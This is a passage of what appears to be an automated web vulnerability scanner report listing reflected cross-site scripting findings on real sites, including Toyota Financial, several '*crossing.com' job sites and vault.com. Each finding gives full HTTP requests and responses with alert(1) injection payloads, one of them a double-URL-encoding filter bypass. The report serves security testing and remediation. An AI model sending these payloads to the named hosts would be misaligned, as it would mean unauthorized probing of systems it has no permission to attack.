The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 8 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xmlb1c4e%253cscript%253ealert%25281%2529%253c%252fscript%253ef7fa252dbe5 HTTP/1.1
Host: www.toyotafinancial.com
Proxy-Connection: keep-alive
Referer: http://www.toyotafinancial.com/consumer/resources/video/tfs/viewer.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ofsc=6bvzN5JHhqXFWZdG3kh6Qnv0Bj8Zw8FCQ3vWn3j6pNn4mFsBLfLD!2083777476!658673615; s_cc=true; s_sq=undefinedtoJSONString%3Dfunction%2520%2528%2529%2520%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520return%2520s.object%2528this%2529%253B%250A%2520%2520%2520%2520%257D%26function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20return%20s.object%28this%29%3B%0A%20%20%20%20%7D%3DtoJSONString; s_vi=[CS]v1|269CEA5D85013CD5-60000105801BCB1F[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:28:03 GMT
Content-length: 237
Content-type: text/html

<html>
<title>Get Primary Binary Error</title>
<body>
The following error occurred while trying to display property:
<p>
Node: /tfs/en_US/video/content/data.xmlb1c4e<script>alert(1)</script>f7fa252dbe5 does not exist.
<p>
...[SNIP]...

3.123. http://www.toyotafinancial.com/consumer/tfs.portal [_pageLabel parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toyotafinancial.com
Path:   /consumer/tfs.portal

Issue detail

The value of the _pageLabel request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c74b"%3balert(1)//3b7137a4f55 was submitted in the _pageLabel parameter. This input was echoed as 6c74b";alert(1)//3b7137a4f55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /consumer/tfs.portal?_nfpb=true&_pageLabel=pg_ForwardEstimator6c74b"%3balert(1)//3b7137a4f55 HTTP/1.1
Host: www.toyotafinancial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:46:17 GMT
Content-type: text/html;charset=UTF-8
Content-Language: en
Set-Cookie: ofsc=nGJrN5JZyqT9YnTWFjkvPwPqhThFY4Gb0TLnh2LvngkM1Jk6CQzB!2083777476!658673615; path=/
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>


   <head>


<title >Toyota Financial Services</title><meta name="bea
...[SNIP]...
() {
//alert("openIntermediateMessageWindowTAM");

var requestURI = window.location.href;
var paramname='http://www.ToyotaThanksAMillion.com';
var from = "pg_ForwardEstimator6c74b";alert(1)//3b7137a4f55"

var URL = '/consumer/jsp/tfs/content/tfsTAMCampaignInterstitial.jsp?paramname='+paramname+'&from='+from;
var wid = screen.availWidth;
var hei = screen.availHeight;

if
...[SNIP]...

3.124. http://www.toyotafinancial.com/consumer/tfs.portal [_pageLabel parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toyotafinancial.com
Path:   /consumer/tfs.portal

Issue detail

The value of the _pageLabel request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1488'%3balert(1)//69259ebce5f was submitted in the _pageLabel parameter. This input was echoed as e1488';alert(1)//69259ebce5f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /consumer/tfs.portal?_nfpb=true&_pageLabel=pg_ForwardEstimatore1488'%3balert(1)//69259ebce5f HTTP/1.1
Host: www.toyotafinancial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:46:19 GMT
Content-type: text/html;charset=UTF-8
Content-Language: en
Set-Cookie: ofsc=slvdN5JblW6q2TLn6GkBZpfndTvp6bvhGvGbjfsWnGQXhqtdFZQL!2083777476!658673615; path=/
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>


   <head>


<title >Toyota Financial Services</title><meta name="bea
...[SNIP]...
ion = 8;
// Minor version of Flash required
var requiredMinorVersion = 0;
// Minor version of Flash required
var requiredRevision = 0;

var pageLabel ='pg_ForwardEstimatore1488';alert(1)//69259ebce5f';

var hasReqestedVersion = false;
hasReqestedVersion = DetectFlashVer(requiredMajorVersion, requiredMinorVersion, requiredRevision);
//alert('hasReqestedVersion:'+hasReqestedVersi
...[SNIP]...

3.125. https://www.toyotafinancial.com/consumer/tfs.portal [_pageLabel parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.toyotafinancial.com
Path:   /consumer/tfs.portal

Issue detail

The value of the _pageLabel request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 693dd"%3balert(1)//8bcb3a6d34b was submitted in the _pageLabel parameter. This input was echoed as 693dd";alert(1)//8bcb3a6d34b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /consumer/tfs.portal?_nfpb=true&_pageLabel=pg_ResourceCenterHome693dd"%3balert(1)//8bcb3a6d34b&_nfls=true&referrer=TYT HTTP/1.1
Host: www.toyotafinancial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; ofsc=FTJHN5JcXX4n9z4wyQc0l1bTdQq7f3Xm1tqdryTQ8yDpFTxTGZvx!658673615!1980963653; s_vi=[CS]v1|269CEA5D85013CD5-60000105801BCB1F[CE]; s_sq=undefinedtoJSONString%2CtoJSONString%3Dfunction%2520%2528%2529%2520%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520return%2520s.object%2528this%2529%253B%250A%2520%2520%2520%2520%257D%26function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20return%20s.object%28this%29%3B%0A%20%20%20%20%7D%3DtoJSONString;

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:55:27 GMT
Content-type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>


   <head>


<title >Toyota Financial Services</title><meta name="bea
...[SNIP]...
{
//alert("openIntermediateMessageWindowTAM");

var requestURI = window.location.href;
var paramname='http://www.ToyotaThanksAMillion.com';
var from = "pg_ResourceCenterHome693dd";alert(1)//8bcb3a6d34b"

var URL = '/consumer/jsp/tfs/content/tfsTAMCampaignInterstitial.jsp?paramname='+paramname+'&from='+from;
var wid = screen.availWidth;
var hei = screen.availHeight;

if
...[SNIP]...

3.126. https://www.toyotafinancial.com/consumer/tfs.portal [_pageLabel parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.toyotafinancial.com
Path:   /consumer/tfs.portal

Issue detail

The value of the _pageLabel request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da0ab'%3balert(1)//9dd97cb4a8 was submitted in the _pageLabel parameter. This input was echoed as da0ab';alert(1)//9dd97cb4a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /consumer/tfs.portal?_nfpb=true&_pageLabel=pg_ResourceCenterHomeda0ab'%3balert(1)//9dd97cb4a8&_nfls=true&referrer=TYT HTTP/1.1
Host: www.toyotafinancial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; ofsc=FTJHN5JcXX4n9z4wyQc0l1bTdQq7f3Xm1tqdryTQ8yDpFTxTGZvx!658673615!1980963653; s_vi=[CS]v1|269CEA5D85013CD5-60000105801BCB1F[CE]; s_sq=undefinedtoJSONString%2CtoJSONString%3Dfunction%2520%2528%2529%2520%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520return%2520s.object%2528this%2529%253B%250A%2520%2520%2520%2520%257D%26function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20return%20s.object%28this%29%3B%0A%20%20%20%20%7D%3DtoJSONString;

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:55:32 GMT
Content-type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>


   <head>


<title >Toyota Financial Services</title><meta name="bea
...[SNIP]...
n = 8;
// Minor version of Flash required
var requiredMinorVersion = 0;
// Minor version of Flash required
var requiredRevision = 0;

var pageLabel ='pg_ResourceCenterHomeda0ab';alert(1)//9dd97cb4a8';

var hasReqestedVersion = false;
hasReqestedVersion = DetectFlashVer(requiredMajorVersion, requiredMinorVersion, requiredRevision);
//alert('hasReqestedVersion:'+hasReqestedVersi
...[SNIP]...

3.127. http://www.tradingcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tradingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f33a8"><script>alert(1)</script>dcf38b67f33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f33a8"><script>alert(1)</script>dcf38b67f33=1 HTTP/1.1
Host: www.tradingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:53 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9bdnnh8975tie73op81om9iv23; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:53 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:53 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:53 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:53 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:53 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:53 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:53 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:53 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 97304

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.tradingcrossing.com/?f33a8"><script>alert(1)</script>dcf38b67f33=1">
...[SNIP]...

3.128. http://www.trainingcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trainingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77df3"><script>alert(1)</script>601a884eba3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?77df3"><script>alert(1)</script>601a884eba3=1 HTTP/1.1
Host: www.trainingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:39:49 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=nums7dcc1j6lqi6c182hojl957; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:39:49 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:39:49 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:39:49 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:39:49 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:39:49 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:39:49 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:39:49 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:39:49 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 102528

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.trainingcrossing.com/?77df3"><script>alert(1)</script>601a884eba3=1">
...[SNIP]...

3.129. http://www.transportationcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.transportationcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7388e"><script>alert(1)</script>3273979c9e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?7388e"><script>alert(1)</script>3273979c9e3=1 HTTP/1.1
Host: www.transportationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:31 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=uu4j24vvnhit3de5jjak5ajl20; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:31 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:31 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:31 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:31 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:31 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:31 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:31 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:31 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 126907

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.transportationcrossing.com/?7388e"><script>alert(1)</script>3273979c9e3=1">
...[SNIP]...

3.130. http://www.travelingcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travelingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29013"><script>alert(1)</script>55f735e164d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?29013"><script>alert(1)</script>55f735e164d=1 HTTP/1.1
Host: www.travelingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:39:28 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=98i3ogstggait0rcvm6cac2nu5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:39:28 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:39:28 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:39:28 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:39:28 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:39:28 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:39:28 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:39:28 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:39:28 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111563

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.travelingcrossing.com/?29013"><script>alert(1)</script>55f735e164d=1">
...[SNIP]...

3.131. http://www.truckingcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.truckingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f69c"><script>alert(1)</script>940d23ae3a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2f69c"><script>alert(1)</script>940d23ae3a1=1 HTTP/1.1
Host: www.truckingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:46 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=reqvomlshroa4lg39ro64hkq76; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:46 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:46 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:46 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:46 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:46 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:46 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:46 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:46 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109198

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.truckingcrossing.com/?2f69c"><script>alert(1)</script>940d23ae3a1=1">
...[SNIP]...

3.132. http://www.tvcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tvcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee91a"><script>alert(1)</script>257bf57adca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ee91a"><script>alert(1)</script>257bf57adca=1 HTTP/1.1
Host: www.tvcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:12 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=seap0ed91uj33tvl8163cvrqq1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:12 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:12 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:12 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:12 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:12 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:12 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:12 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:12 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 101362

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.tvcrossing.com/?ee91a"><script>alert(1)</script>257bf57adca=1">
...[SNIP]...

3.133. http://www.underwritingcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.underwritingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10cd2"><script>alert(1)</script>eddf6cfe54a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?10cd2"><script>alert(1)</script>eddf6cfe54a=1 HTTP/1.1
Host: www.underwritingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:57 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ug7iikt1hilvoorm6cbc5913m2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:57 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:57 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:57 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:57 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:57 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:57 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:57 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:57 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103021

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.underwritingcrossing.com/?10cd2"><script>alert(1)</script>eddf6cfe54a=1">
...[SNIP]...

3.134. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f2df'%3balert(1)//8ecbb1f6508 was submitted in the REST URL parameter 4. This input was echoed as 9f2df';alert(1)//8ecbb1f6508 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wps/portal/usa/9f2df'%3balert(1)//8ecbb1f6508/company-profile/Vinson-&-Elkins-LLP HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 18:46:35 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIBNjI30v_aj0nPwkkEon_XCQdmTlQY4uBp7OXuZBwf5exgYWBhB5AxzA0UDfzyM_N1W_IDvJIMvEUREAyuriAQ!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Content-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIBNjI30v_aj0nPwkkEon_XCQdmTlQY4uBp7OXuZBwf5exgYWBhB5AxzA0UDfzyM_N1W_IDvJIMvEUREAyuriAQ!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000M6HzNwpPLpJtCoH-PvGbXWY:14a07ck6b; Path=/
Keep-Alive: timeout=10, max=10
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a9145525d5f4f58455e445a4a423660;expires=Fri, 21-Jan-2011 19:13:38 GMT;path=/
Content-Length: 71712


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
alse , hideGigyaLink:true , useHTML:true ,showWhatsThis: true ,containerID: 'loginDiv' ,redirectURL: 'http://' + window.location.hostname + '/wps/portal/usa/membership?mode=31&lastPage=/wps/portal/usa/9f2df';alert(1)//8ecbb1f6508'
};

var conf =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin'
};

var conf2 =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin,google,messenger'
...[SNIP]...

3.135. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP [companyId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Issue detail

The value of the companyId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97fb2"><script>alert(1)</script>3bad20cc3eb was submitted in the companyId parameter. This input was echoed unmodified in the application's response.
